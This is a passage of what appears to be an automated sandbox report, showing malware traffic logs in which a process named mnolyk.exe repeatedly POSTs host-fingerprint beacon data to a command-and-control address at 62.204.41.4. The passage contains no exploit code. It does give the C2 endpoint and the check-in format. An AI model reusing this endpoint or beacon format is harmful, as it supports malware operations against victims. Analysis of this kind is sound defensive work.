                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.130172968 CET729INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      615192.168.2.75031062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:47.315519094 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.380167007 CET730INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      616192.168.2.75031162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:47.562395096 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.626136065 CET731INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      617192.168.2.75031262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:47.795938015 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:47.859386921 CET732INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      618192.168.2.75031362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:48.033864975 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.097645998 CET733INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      619192.168.2.75031462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:48.299453974 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.361939907 CET734INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      62192.168.2.74975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:16.570116043 CET177OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.632927895 CET177INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      620192.168.2.75031562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:48.543329954 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.608316898 CET735INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      621192.168.2.75031662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:48.784877062 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:48.847752094 CET736INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      622192.168.2.75031762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:49.028783083 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.092154026 CET737INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      623192.168.2.75031862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:49.262876034 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.325089931 CET738INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      624192.168.2.75031962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:49.495651960 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.557312012 CET739INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      625192.168.2.75032062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:49.746311903 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:49.811568022 CET740INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      626192.168.2.75032162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:50.021531105 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.086796999 CET741INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      627192.168.2.75032262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:50.288219929 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.352765083 CET742INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      628192.168.2.75032362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:50.536075115 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.598954916 CET743INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      629192.168.2.75032462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:50.786571026 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:50.849370003 CET744INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      63192.168.2.74975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:16.813664913 CET178OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.878535032 CET178INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      630192.168.2.75032562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:51.040293932 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.107878923 CET745INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      631192.168.2.75032662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:51.276591063 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.341442108 CET746INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
